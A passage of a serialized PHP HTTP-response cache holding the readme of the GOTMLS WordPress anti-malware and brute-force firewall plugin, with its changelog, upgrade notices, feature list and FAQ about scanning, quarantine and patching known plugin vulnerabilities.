yuzo-related-post plugin.\n* Updated the Quarantine interface and added a re-scan / re-clean feature.\n* Fixed a bug in the scan depth array that would produce PHP Notices in the error_log files under certain conditions.\n* Changed some wording and other minor fomatting issues.\n* Removed some outdated JavaScript that is no longer needed.\n* Checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\n* Fixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\n* Fixed a bug in the Firewall that prevented some iPad devices from logging in.\n* Fixed an encoding bug that prevented the Examine File window from dispaying some file formats.\n* Restored the File Details window in the Examine File window.\n* Updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\n* Added a whole new DB Scan category that looks for links and scripts injected directly into the database content and removes them.\n* Updated Firewall landing page for HTTPS compatibility.\n* Removed some old code that was no longer needed.\n* Added a feature to clear cache files before running the Complete Scan, this will speed up the scan and prevent malware from being saved on your cached paged.\n* Updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\n* Updated code for compatibility with WP 4.9.8 (latest release).\n* Fixed PHP Notice for the unknown offset of SERVER_parts.\n* Escaped single-quotes in translated strings for use within JavaScript.\n\n= 4.17.68 =\n* Updated code for compatibility with WP 4.9.7 (latest release).\n* Removed wrong size dashicon from Settings link in plugin list.\n* Removed the broken link to vote WORKS on wordpress.org.\n* Reordered priorety on fixing Known Threats to be more efficient.\n\n= 4.17.58 =\n* Updated code for compatibility with WP 4.9.4 (latest release).\n* Fixed dashicons sizing in css.\n* Add ability to update registration email from within the plugin settings.\n* Cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\n* Updated code for compatibility with WP 4.9.3 (latest release).\n* Fixed registration form and alternate domain for definition updates to work on HTTPS.\n* Fixed the wording on the Title check error message.\n\n= 4.17.44 =\n* Added Title check to make sure it does say you were hacked.\n* Updated code for compatibility with WP 4.8.3 (latest release).\n* Fixed Undefined variable error in Quarantine.\n* Fixed XSS vulnerability in nonce error output.\n\n= 4.17.29 =\n* Changed the definition update URL to only use SSL when required.\n* Updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\n* Added the Turkish translation thanks to Umut Can Alparslan.\n* Improved the auto update so that old definitions could be phased out and new threat types would be selected by default.\n* Fixed the admin username change feature on multisite installs.\n* Fixed the details window so that it scrolls to the highlighted code.\n* Set defaults to disable the Potential Threat scan if other threats definitions are enabled.\n* Encoded definitions array for DB storage.\n* Fixed syntax error in the XMLRPC patch for newer versions of Apache.\n* Added fall-back to manual updates if the Automatic update feature fails.\n* Fixed PHP Notices about undefined variable added in last Version release.\n* Improved Apache version detection.\n* Changed Automatic update feature to automatically download all definitions and firewall updates.\n* Added PHP and Apache version detections and changed the XMLRPC patch to work with Apache 2.4 directives.\n* Removed the onbeforeunload function because Norton detected it as a False Positive.\n* Removed code that was deprecated in PHP Version 7.\n* Fixed PHP Notice about an array to string conversion with some rare global variable conditions.\n* Added more firewall options.\n* Moved Scan Log from the Quarantine page to the main Setings page.\n* Fixed PHP Warning about an invalid argument in foreach and some other bugs too.\n* Fixed \"What to look for\" Options so that changes are saved.\n* Changed get_currentuserinfo to wp_get_current_user because the get_currentuserinfo function was deprecated in WP 4.5\n\n= 4.16.17 =\n* Removed Menu Item Placement Options because the add_object_page function was deprecated in WP 4.5.\n* Added firewall options for better compatibility with WP Firewall 2.\n* Fixed an XSS vulnerability in the debug output of the nonce token.\n* Moved the Firewall Options to it\'s own page linked to from the admin menu.\n* Moved the Quick Scan from the admin menu to the top of the Scan Settings page.\n* Fixed PHP Warning about in_array function expecting parameter 2 to be an array, found by Georgey B.\n* Made a few minor cosmetic changes and fixed a few other small bugs in the interface.\n* Fixed the Nonce Token error caused by W3 Total Cache breaking the set_transient function in WordPress.\n* Added the Brazilian Portuguese language files, thanks to Marcelo Guernieri for the translation.\n* Fixed the admin menu and also some links that did not work on Windows server.\n* Added Core Files to the Quick Scan list on the admin menu.\n* Added a nonce token to prevent Cross-Site Request Forgery by admins who are logged-in from another site.\n* Hardened against XSS vulnerability triggered by the file names being scanned (thanks to Mahadev Subedi).\n* Improved brute-force patch compatibility with alternate wp-config.php location.\n* Had to remove the encoding of the Default Definitions to meet the WordPress Plugin Guidelines.\n* Improved the JavaScript in the new Brute-Force login patch so that it works with caching enabled on the login page.\n* Improved the Brute-Force login patch with custom fields and JavaScript. \n* Added a Save button to that Scan Settings page.\n* Fixed a bug in the XMLRPC Patch \"Unblock\" feature.\n* Added a link to purge the deleted Quarantine items from the database.\n* Added firewall option to Block all XMLRPC calls.\n* Fixed a few cosmetic bugs in the quarantine and firewall options.\n* Fixed a bugs in the Quarantine that was memory_limit errors if there number of files in the was too high.\n* Added the highlight malicious code feature back to the Quarantine file viewer.\n* Added the ability to change the admin username if the current username is \"admin\".\n* Improved the code in the Brute-Force Protection patch.\n* Fixed a few bugs in the Core Files Check that was preventing it from fixing some unusual file modifications.\n* Fixed a major bug that made multisite scan extremely slow and sometimes error out.\n* Moved all ajax call out of the init function and into their own functions for better handling time.\n* Moved the quarantine files into the database and deleted the old directory in uploads.\n* Fixed some minor formatting issues in the HTML output on the settings page.\n* Added a warning message if base64_decode has been disabled.\n* Hardened against injected HTML content by encoding the tags with variables.\n* Fixed debug option to exclude individual definitions.\n* Hardened admin_init with current_user_can and realpath on the quarantine file deletion (thanks to J.D. Grimes).\n* Fixed another XSS vulnerabilities in the admin (thanks to James H.)\n* Hardened against XSS vulnerabilities in the admin (thanks to Tim Coen).\n* Added feature to restore default settings for Exclude Extensions.\n* Changed the encoding on the index.php file in the Quarantine to make it more human-readable.\n* Fixed a few small bugs that were throwing PHP Notices in some configurations and added more info to some error messages.\n* Extended execution_time during the Fix process to increase the number of files that could be fixed at a time.\n* Added a Quarantine log to the database.\n* Fixed a couple of minor bugs that would throw PHP notices.\n\n= 4.15.16 =\n* Created an automatic update feature that downloads any new definition updates before starting the scan.\n* Added WordPress Core files to the new definitions update process and included a scan option to check the integrity of the Core files.\n* Automatically whitelisted the unmodified WordPress Core files.\n* Made more improvements to the Brute-Force protection patch and other minor cosmetic changes to the interface.\n* Protected the HTML in my plugin from filter injections and fixed a few other minor bugs.\n* Fixed a problem with deleting files from the Quarantine folder.\n* Added a descriptive reason to the error displayed if the fix was unsuccessful.\n* Added link to restore the default location of the Examine Results window.\n* Improved the encoding of definition updates so that they would not be blocked by poorly written firewall rules.\n* Suppressed the \"Please make a donation\" nag if the fix was unsuccessful, to avoid confusion over premium services.\n* Removed debug alert from initial session check.\n* Improved rewrite compatibility of session check for the Brute-Force Protection Installation.\n* Improved session check for the option to Install Brute-Force Protection and added an error message on failure.\n* Improved support for Multisite by only allowing Network Admins access to the Anti-Malware menu.\n* Added link to view a simple scan history on the Quarantine page.\n* Updated firewall to better protect agains new variations of the RevSlider Exploit.\n* Improved check for session support before giving the option to Install Brute-Force patch.\n* Added option to skip scanning the Quarantined files.\n* Updated Brute-Force patch to fix the problem of being included more that once.\n* Fixed a few minor bugs (better window positioning and css, cleaner results page, updated new help tab, etc.).\n* Made sure that the plugin does not check my servers for updates unless you have registered (this opt-in requirement is part of the WordPress Repository Guidelines).\n* Added exception for the social.png files to the skip files by extension list.\n* Fixed removal of Known Threats from files in the Quarantine directory.\n* Block SoakSoak and other malware from exploiting the Slider Revolution Vulnerability (THIS IS A WIDESPREAD THREAT RIGHT NOW).\n* Enabled the Brute-Force protection option directly from the Settings page.\n* Fixed window position to auto-adjust on small screens.\n\n= 4.14.47 =\n* Major upgrade to the protection for wp-login.php Brute-Force attempts.\n* Fixes a bug in setting the permissions for read-only files so that they could still be cleaned.\n* Fixes a minor bug with pass-by-reference which raises a fatal error in PHP v5.4.\n* Enhanced the Examine File window with better styles and more info.\n* Changed form submission of encrypted file lists to array values instead of keys.\n* Fixes other minor bugs.\n* Made the Examine File window sizable.\n* Fixed a few small bugs and removed some old code.\n* Added a link to my new twitter account.\n* Re-purposed Quick Scan to just scan the most affected areas.\n* Set the registration form to display by defaulted in the definition update section.\n* Fixed a few small bugs in advanced features and directory depth determination.\n* Fixed a session bug to display the last directory scanned.\n* Fixed a few small cosmetic bugs for WP 3.8.\n* Added Spanish translation, thanks to Jelena Kovacevic and Andrew Kurtis at webhostinghub.com.\n* Updated string in the code and added a .pot file to be ready for translation into other languages.\n* Added \"Select All\" checkbox to Quarantine and a new button to delete items from the Quarantine.\n* Added a trace.php file for advanced session tracking.\n* Fixed undefined index bug with menu_group item in settings array.\n* Added support for multisite network admin menu and the ability to restrict admin access.\n* Fixed a session bug in the progress bar related to the last release.\n* Fixed a session bug that conflicted with jigoshop. (Thanks dragonflyfla)\n* Fixed a few bug in the Whitelist definition feature.\n\n= 3.07.06 =\n* Added SSL support for definition updates and registration form.\n* Upgraded the Whitelist feature so the it could not contain duplicates.\n* Downgraded the WP-Login threat and changed it to an opt-in fix.\n* Fixed a bug in the Add to Whitelist feature so the you do not need to update the definitions after whitelisting a file.\n* Added ability to whitelist files.\n* Fixed a major bug in yesterdays release broke the login page on some sites.\n* Added a patch for the wp-login.php brute force attack that has been going around.\n* Created a process to restore files from the Quarantine.\n* Fixed a few other small bugs including path issues on Winblows server.\n\n= 1.3.02.15 =\n* Improved security on the Quarantine directory to fix the 500 error on some servers.\n* Fixed count of Quarantined items.\n* Added htaccess security to the Uploads directory.\n* Linked the Quarantined items to the File Examiner.\n* Added a scan category for Backdoor Scripts.\n* Consolidated the Definition Types and added a Whitelist category.\n* Completely redesigned the Definition Updates to handle incremental updates.\n* Added \"View Quarantine\" to the menu.\n* Enhanced Output Buffer to work with compression enabled (like ob_gzhandler).\n* Moved the quarantine to the uploads directory to protect against blanket inclusion.\n* Fixed Output Buffer issue for when ob_start has already been called.\n* Enhanced the Automatic Fix process to handle bad directory permissions.\n* Added more detailed error messages for different types of file errors.\n* Improved overall error handling.\n* Minor UI enhancements and a few bug fixes.\n* Completely revamped the scan engine to handle large file systems with better error handling.\n* Enhanced the results for the Automatic Fix process.\n* Fixed a few other small bugs.\n* Enhanced the iFrame for the File Viewer and Automatic Fix process.\n* Improved error handling during the scan.\n* Moved the File Viewer and Automatic Fix process into an iFrame to decrease scan time and memory usage.\n* Enhanced the Automatic Fix process for better success with read-only files.\n* Improved code cleanup process and general efficiency of the scan.\n* Encoded definition update for better compatibility with some servers that have post limitation.\n* Fixed XSS vulnerability.\n* Changed registration to allow for multiple sites/keys to be registered under one user/email.\n* Changed auto-update path to update threat level array for all new definition updates.\n* Updated timthumb replacement patch to version 2.8.10 per WordPress.org plugins requirement.\n* Fixed option to exclude directories so that the scan would not get stuck if omitted.\n* Added support for winblows servers using BACKSLASH directory structures.\n* Changed definition updates to write to the DB instead of a file.\n\n= 1.2.03.23 =\n* First versions available for WordPress (code removed, no longer compatible).\n\n== Upgrade Notice ==\n\n= 4.20.72 =\nUpdated registration form, fixed session check, and removed older code from WordPress Repository.\n\n= 4.20.59 =\nVarious minor bug fixes, added Core Files Definitions for ClassicPress, and tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\nFixed a JavaScript error caused by a new French translation and checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\nUpdated some external links and tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\nAdded even more error handling to the DB Scan for low memory_limit, modified the Directory Scan Depth to accept 0 as way to skip the Directory Scan, and added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\nUpdated links, added more error handling to the DB Scan, various performance improvements, fixed path to work on Windows servers and a few minor bugs causing PHP Notices, and weaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\nCleaned up the Nonce Token code and Quarantine page, fixed recovery link, and added debugging for login errors plus WP head and footer Hooks.\n\n= 4.18.74 =\nFixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\nAdded wp_options table to the db_scan and fixed a few minor bugs in the quarantine view, and changed some wording and checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\nAdded a Warning message about the vulnerability in the yuzo-related-post plugin,  updated the Quarantine interface with a re-scan / re-clean feature, fixed a bug in the scan depth array that would produce PHP Notices, changed some wording and other minor fomatting issues, and checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\nFixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\nFixed a few minor bugs and updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\nAdded a whole new DB Scan category, updated Firewall landing page, removed some old code that was no longer needed, clear cache files before running the Complete Scan,, and updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\nUpdated code for compatibility with WP 4.9.8, fixed PHP Notice and escaped single-quotes in translated strings.\n\n= 4.17.68 =\nUpdated code for compatibility with WP 4.9.7, removed dashicon from Settings link and the broken vote WORKS link, and reordered priorety on fixing Known Threats.\n\n= 4.17.58 =\nUpdated code for compatibility with WP 4.9.4, fixed dashicons sizing in css, add ability to update registration email from within the plugin settings, and cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\nUpdated code for compatibility with WP 4.9.3, fixed registration form and alternate domain for definition updates to work on HTTPS, and fixed the wording on the Title Check error message.\n\n= 4.17.44 =\nAdded Title check to make sure it does say you were hacked, updated code for compatibility with WP 4.8.3 and fixed Undefined variable error in Quarantine and an XSS vulnerability in nonce error output.\n\n= 4.17.29 =\nChanged the definition update URL to only use SSL when required, and updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\nAdded the Turkish translation thanks to Umut Can Alparslan, improved the auto update feature, and fixed the admin username change feature on multisite installs (Plus many other improvement from v4.16.X: see Changelog for details).\n\n= 4.16.17 =\nRemoved Menu Item Placement Options that were deprecated in WP 4.5, Added firewall options for better compatibility with WP Firewall 2, and fixed an XSS vulnerability in the debug output of the nonce token (Plus many other improvement from v4.15.X: see Changelog for details).\n\n= 4.15.16 =\nCreated automatic definition updates that include WordPress Core files, more improvements to the Brute-Force protection patch (Plus many other improvement from v4.14.X: see Changelog for details).\n\n= 4.14.47 =\nMajor upgrade to the protection for Brute-Force attempts, and a bug fix for resetting the permissions of read-only files (Plus many other improvement from v3.X: see Changelog for details).\n\n= 3.07.06 =\nAdded SSL support for definition updates and upgraded the Whitelist feature (Plus many other improvement from v1.3.X: see Changelog for details).\n\n= 1.3.02.15 =\nImproved security on the Quarantine directory to fix the 500 error on some servers (Plus many other improvement from v1.2.X: see Changelog for details).\n\n= 1.2.03.23 =\nFirst versions available for WordPress (code removed, no longer compatible).\n\";s:7:\"headers\";O:25:\"Requests_Response_Headers\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";a:1:{i:0;s:5:\"nginx\";}s:4:\"date\";a:1:{i:0;s:29:\"Wed, 22 Sep 2021 12:59:49 GMT\";}s:12:\"content-type\";a:1:{i:0;s:10:\"text/plain\";}s:14:\"content-length\";a:1:{i:0;s:5:\"28779\";}s:13:\"last-modified\";a:1:{i:0;s:29:\"Tue, 15 Jun 2021 18:40:25 GMT\";}s:4:\"etag\";a:1:{i:0;s:34:\"\"2548470//gotmls/trunk/readme.txt\"\";}s:13:\"cache-control\";a:1:{i:0;s:14:\"max-age=604800\";}s:13:\"accept-ranges\";a:1:{i:0;s:5:\"bytes\";}}}s:11:\"status_code\";i:200;s:16:\"protocol_version\";d:1.100000000000000088817841970012523233890533447265625;s:7:\"success\";b:1;s:9:\"redirects\";i:0;s:3:\"url\";s:57:\"https://plugins.svn.wordpress.org/gotmls/trunk/readme.txt\";s:7:\"history\";a:0:{}s:7:\"cookies\";O:19:\"Requests_Cookie_Jar\":1:{s:10:\"\0*\0cookies\";a:0:{}}}s:11:\"\0*\0filename\";N;s:4:\"data\";N;s:7:\"headers\";N;s:6:\"status\";N;}}s:8:\"response\";s:28779:\"=== Anti-Malware Security and Brute-Force Firewall ===\nPlugin URI: http://gotmls.net/\nAuthor: Eli Scheetz\nAuthor URI: http://wordpress.ieonly.com/category/my-plugins/anti-malware/\nContributors: scheeeli, gotmls\nDonate link: https://gotmls.net/donate/\nTags: security, firewall, anti-malware, scanner, automatic, repair, remove, malware, virus, threat, hacked, malicious, infection, timthumb, exploit, block, brute-force, wp-login, patch, antimalware, revslider, Revolution Slider\nVersion: 4.20.72\nStable tag: 4.20.72\nRequires at least: 3.3\nTested up to: 5.7.2\n\nThis Anti-Malware scanner searches for Malware, Viruses, and other security threats and vulnerabilities on your server and it helps you fix them.\n\n== Description ==\n\n**Features:**\n\n* Download Definition Updates to protect against new threats.\n* Run a Complete Scan to automatically remove known security threats, backdoor scripts, and database injections.\n* Firewall block SoakSoak and other malware from exploiting Revolution Slider and other plugins with known vulnerabilites.\n* Upgrade vulnerable versions of timthumb scripts.\n\n**Premium Features:**\n\n* Patch your wp-login and XMLRPC to block Brute-Force and DDoS attacks.\n* Check the integrity of your WordPress Core files.\n* Automatically download new Definition Updates when running a Complete Scan.\n\nRegister this plugin at [GOTMLS.NET](http://gotmls.net/) and get access to new definitions of \"Known Threats\" and added features like Automatic Removal, plus patches for specific security vulnerabilities like old versions of timthumb. Updated definition files can be downloaded automatically within the admin once your Key is registered. Otherwise, this plugin just scans for \"Potential Threats\" and leaves it up to you to identify and remove the malicious ones.\n\nNOTICE: This plugin make call to GOTMLS.NET to check for updates not unlike what WordPress does when checking your plugins and themes for new versions. Staying up-to-date is an essential part of any security plugin and this plugin can let you know when there are new plugin and definition update available. If you\'re allergic to \"phone home\" scripts then don\'t use this plugin (or WordPress at all for that matter).\n\n**Special thanks to:**\n\n* Clarus Dignus for design suggestions and graphic design work on the banner image.\n* Jelena Kovacevic and Andrew Kurtis of webhostinghub.com for providing the Spanish translation.\n* Marcelo Guernieri for the Brazilian Portuguese translation.\n* Umut Can Alparslan for the Turkish translation.\n\n== Installation ==\n\n1. Download and unzip the plugin into your WordPress plugins directory (usually `/wp-content/plugins/`).\n1. Activate the plugin through the \'Plugins\' menu in your WordPress Admin.\n1. Register on gotmls.net and download the newest definition updates to scan for Known Threats.\n\n== Frequently Asked Questions ==\n\n= Why should I register? =\n\nIf you register on [GOTMLS.NET](http://gotmls.net/) you will have access to download definitions of New Threats and added features like automatic removal of \"Known Threats\" and patches for specific security issues like old versions of timthumb and brute-force attacks on wp-login.php. Otherwise, this plugin only scans for \"Potential Threats\" on your site, it would then be up to you to identify the good from the bad and remove them accordingly. \n\n= How do I patch the Revolution Slider vulnerability? =\n\nEasy, if you have installed and activated my this Anti-Malware plugin on your site then it will automatically block attempts to exploit the Revolution Slider vulnerability.\n\n= How do I patch the wp-login vulnerability? =\n\nThe WordPress Login page is susceptible to a brute-force attack (just like any other login page). These types of attacks are becoming more prevalent these days and can sometimes cause your server to become slow or unresponsive, even if the attacks do not succeed in gaining access to your site. This plugin can apply a patch that will block access to the WordPress Login page whenever this type of attack is detected. Just click the Install Patch button under Brute-force Protection on the Anti-Malware Setting page. For more information on this subject [read my blog](http://gotmls.net/tag/wp-login-php/).\n\n= Why can\'t I automatically remove the \"Potential Threats\" in yellow? =\n\nMany of these files may use eval and other powerful PHP function for perfectly legitimate reasons and removing that code from the files would likely cripple or even break your site so I have only enabled the Auto remove feature for \"Know Threats\".\n\n= How do I know if any of the \"Potential Threats\" are dangerous? =\n\nClick on the linked filename to examine it, then click each numbered link above the file content box to highlight the suspicious code. If you cannot tell whether or not the code is malicious just leave it alone or ask someone else to look at it for you. If you find that it is malicious please send me a copy of the file so that I can add it to my definition update as a \"Know Threat\", then it can be automatically removed.\n\n= What if the scan gets stuck part way through? =\n\nFirst just leave it for a while. If there are a lot of files on your server it could take quite a while and could sometimes appear to not be moving along at all even if it really is working. If it still seems stuck after a while then try running the scan again, be sure you try both the Complete Scan and the Quick scan.\n\n= How did I get hacked in the first place? =\n\nFirst, don\'t take the attack personally. Lots of hackers routinely run automated script that crawl the internet looking for easy targets. Your site probably got hacked because you are unknowingly an easy target. This might be because you are running an older version of WordPress or have installed a Plugin or Theme with a backdoor or known security vulnerability. However, the most common type of infection I see is cross-contamination. This can happen when your site is on a shared server with other exploitable sites that got infected. In most shared hosting environments it\'s possible for hackers to use an one infected site to infect other sites on the same server, sometimes even if the sites are on different accounts.\n\n= What can I do to prevent it from happening again? =\n\nThere is no sure way to protect your site from every kind of hack attempt. That said, don\'t be an easy target. Some basic steps should include: hardening your password, keeping all your sites up-to-date, and run regular scans with Anti-Malware software like [GOTMLS.NET](http://gotmls.net/)\n\n= Why does sucuri.net or the Google Safe Browsing Diagnostic page still say my site is infected after I have removed the malicious code? =\n\nsucuri.net caches their scan results and will not refresh the scan until you click the small link near the bottom of the page that says \"Force a Re-scan\" to clear the cache. Google also caches your infected pages and usually takes some time before crawling your site again, but you can speed up that process by Requesting a Review in the Malware or Security section of [Google Webmaster Tools](https://www.google.com/webmasters/tools/). It is a good idea to have a Webmaster Tools account for your site anyway as it can provide lots of other helpful information about your site.\n\n== Screenshots ==\n\n1. The menu showing Anti-Malware options.\n2. The Scan Setting page in the admin.\n3. An example scan that found some threats.\n4. The results window when \"Automatic Repair\" fixes threats.\n5. The Quarantine showing threats that have been fix already.\n\n== Changelog ==\n\n= 4.20.72 =\n* Updated registration form to be more compatible with newer iframe restrictions.\n* Fixed session check on the Brute-Force patch to no longer need mod_rewrite.\n* Removed older code from WordPress Repository.\n\n= 4.20.59 =\n* Various minor bug fixes.\n* Added Core Files Definitions for ClassicPress.\n* Tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\n* Fixed a JavaScript error caused by a new French translation.\n* Checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\n* Updated some external links.\n* Tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\n* Added even more error handling to the DB Scan for servers with the PHP memory_limit set too low.\n* Modified the Directory Scan Depth to accept 0 as a value to indicate skipping the Directory Scan (use this to focus on the DB Scan).\n* Added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\n* Updated links to use HTTPS by default and fixed some old URLs.\n* Various performance improvements.\n* Added more error handling to the DB Scan.\n* Fixed a few minor bugs causing PHP Notices.\n* Fixed a path search to work on Windows servers.\n* Tweaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\n* Cleaned up the Nonce Token creation and storage functions.\n* Cleaned up View Quarantine page and fixed recovery link.\n* Added debugging for login errors WP head and footer Hooks.\n\n= 4.18.74 =\n* Fixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\n* Added wp_options table to the db_scan.\n* Fixed a few minor bugs in the db scan quarantine view.\n* Changed some wording and other minor fomatting issues.\n* Checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\n* Added a Warning message about the vulnerability in the yuzo-related-post plugin.\n* Updated the Quarantine interface and added a re-scan / re-clean feature.\n* Fixed a bug in the scan depth array that would produce PHP Notices in the error_log files under certain conditions.\n* Changed some wording and other minor fomatting issues.\n* Removed some outdated JavaScript that is no longer needed.\n* Checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\n* Fixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\n* Fixed a bug in the Firewall that prevented some iPad devices from logging in.\n* Fixed an encoding bug that prevented the Examine File window from dispaying some file formats.\n* Restored the File Details window in the Examine File window.\n* Updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\n* Added a whole new DB Scan category that looks for links and scripts injected directly into the database content and removes them.\n* Updated Firewall landing page for HTTPS compatibility.\n* Removed some old code that was no longer needed.\n* Added a feature to clear cache files before running the Complete Scan, this will speed up the scan and prevent malware from being saved on your cached paged.\n* Updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\n* Updated code for compatibility with WP 4.9.8 (latest release).\n* Fixed PHP Notice for the unknown offset of SERVER_parts.\n* Escaped single-quotes in translated strings for use within JavaScript.\n\n= 4.17.68 =\n* Updated code for compatibility with WP 4.9.7 (latest release).\n* Removed wrong size dashicon from Settings link in plugin list.\n* Removed the broken link to vote WORKS on wordpress.org.\n* Reordered priorety on fixing Known Threats to be more efficient.\n\n= 4.17.58 =\n* Updated code for compatibility with WP 4.9.4 (latest release).\n* Fixed dashicons sizing in css.\n* Add ability to update registration email from within the plugin settings.\n* Cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\n* Updated code for compatibility with WP 4.9.3 (latest release).\n* Fixed registration form and alternate domain for definition updates to work on HTTPS.\n* Fixed the wording on the Title check error message.\n\n= 4.17.44 =\n* Added Title check to make sure it does say you were hacked.\n* Updated code for compatibility with WP 4.8.3 (latest release).\n* Fixed Undefined variable error in Quarantine.\n* Fixed XSS vulnerability in nonce error output.\n\n= 4.17.29 =\n* Changed the definition update URL to only use SSL when required.\n* Updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\n* Added the Turkish translation thanks to Umut Can Alparslan.\n* Improved the auto update so that old definitions could be phased out and new threat types would be selected by default.\n* Fixed the admin username change feature on multisite installs.\n* Fixed the details window so that it scrolls to the highlighted code.\n* Set defaults to disable the Potential Threat scan if other threats definitions are enabled.\n* Encoded definitions array for DB storage.\n* Fixed syntax error in the XMLRPC patch for newer versions of Apache.\n* Added fall-back to manual updates if the Automatic update feature fails.\n* Fixed PHP Notices about undefined variable added in last Version release.\n* Improved Apache version detection.\n* Changed Automatic update feature to automatically download all definitions and firewall updates.\n* Added PHP and Apache version detections and changed the XMLRPC patch to work with Apache 2.4 directives.\n* Removed the onbeforeunload function because Norton detected it as a False Positive.\n* Removed code that was deprecated in PHP Version 7.\n* Fixed PHP Notice about an array to string conversion with some rare global variable conditions.\n* Added more firewall options.\n* Moved Scan Log from the Quarantine page to the main Setings page.\n* Fixed PHP Warning about an invalid argument in foreach and some other bugs too.\n* Fixed \"What to look for\" Options so that changes are saved.\n* Changed get_currentuserinfo to wp_get_current_user because the get_currentuserinfo function was deprecated in WP 4.5\n\n= 4.16.17 =\n* Removed Menu Item Placement Options because the add_object_page function was deprecated in WP 4.5.\n* Added firewall options for better compatibility with WP Firewall 2.\n* Fixed an XSS vulnerability in the debug output of the nonce token.\n* Moved the Firewall Options to it\'s own page linked to from the admin menu.\n* Moved the Quick Scan from the admin menu to the top of the Scan Settings page.\n* Fixed PHP Warning about in_array function expecting parameter 2 to be an array, found by Georgey B.\n* Made a few minor cosmetic changes and fixed a few other small bugs in the interface.\n* Fixed the Nonce Token error caused by W3 Total Cache breaking the set_transient function in WordPress.\n* Added the Brazilian Portuguese language files, thanks to Marcelo Guernieri for the translation.\n* Fixed the admin menu and also some links that did not work on Windows server.\n* Added Core Files to the Quick Scan list on the admin menu.\n* Added a nonce token to prevent Cross-Site Request Forgery by admins who are logged-in from another site.\n* Hardened against XSS vulnerability triggered by the file names being scanned (thanks to Mahadev Subedi).\n* Improved brute-force patch compatibility with alternate wp-config.php location.\n* Had to remove the encoding of the Default Definitions to meet the WordPress Plugin Guidelines.\n* Improved the JavaScript in the new Brute-Force login patch so that it works with caching enabled on the login page.\n* Improved the Brute-Force login patch with custom fields and JavaScript. \n* Added a Save button to that Scan Settings page.\n* Fixed a bug in the XMLRPC Patch \"Unblock\" feature.\n* Added a link to purge the deleted Quarantine items from the database.\n* Added firewall option to Block all XMLRPC calls.\n* Fixed a few cosmetic bugs in the quarantine and firewall options.\n* Fixed a bugs in the Quarantine that was memory_limit errors if there number of files in the was too high.\n* Added the highlight malicious code feature back to the Quarantine file viewer.\n* Added the ability to change the admin username if the current username is \"admin\".\n* Improved the code in the Brute-Force Protection patch.\n* Fixed a few bugs in the Core Files Check that was preventing it from fixing some unusual file modifications.\n* Fixed a major bug that made multisite scan extremely slow and sometimes error out.\n* Moved all ajax call out of the init function and into their own functions for better handling time.\n* Moved the quarantine files into the database and deleted the old directory in uploads.\n* Fixed some minor formatting issues in the HTML output on the settings page.\n* Added a warning message if base64_decode has been disabled.\n* Hardened against injected HTML content by encoding the tags with variables.\n* Fixed debug option to exclude individual definitions.\n* Hardened admin_init with current_user_can and realpath on the quarantine file deletion (thanks to J.D. Grimes).\n* Fixed another XSS vulnerabilities in the admin (thanks to James H.)\n* Hardened against XSS vulnerabilities in the admin (thanks to Tim Coen).\n* Added feature to restore default settings for Exclude Extensions.\n* Changed the encoding on the index.php file in the Quarantine to make it more human-readable.\n* Fixed a few small bugs that were throwing PHP Notices in some configurations and added more info to some error messages.\n* Extended execution_time during the Fix process to increase the number of files that could be fixed at a time.\n* Added a Quarantine log to the database.\n* Fixed a couple of minor bugs that would throw PHP notices.\n\n= 4.15.16 =\n* Created an automatic update feature that downloads any new definition updates before starting the scan.\n* Added WordPress Core files to the new definitions update process and included a scan option to check the integrity of the Core files.\n* Automatically whitelisted the unmodified WordPress Core files.\n* Made more improvements to the Brute-Force protection patch and other minor cosmetic changes to the interface.\n* Protected the HTML in my plugin from filter injections and fixed a few other minor bugs.\n* Fixed a problem with deleting files from the Quarantine folder.\n* Added a descriptive reason to the error displayed if the fix was unsuccessful.\n* Added link to restore the default location of the Examine Results window.\n* Improved the encoding of definition updates so that they would not be blocked by poorly written firewall rules.\n* Suppressed the \"Please make a donation\" nag if the fix was unsuccessful, to avoid confusion over premium services.\n* Removed debug alert from initial session check.\n* Improved rewrite compatibility of session check for the Brute-Force Protection Installation.\n* Improved session check for the option to Install Brute-Force Protection and added an error message on failure.\n* Improved support for Multisite by only allowing Network Admins access to the Anti-Malware menu.\n* Added link to view a simple scan history on the Quarantine page.\n* Updated firewall to better protect agains new variations of the RevSlider Exploit.\n* Improved check for session support before giving the option to Install Brute-Force patch.\n* Added option to skip scanning the Quarantined files.\n* Updated Brute-Force patch to fix the problem of being included more that once.\n* Fixed a few minor bugs (better window positioning and css, cleaner results page, updated new help tab, etc.).\n* 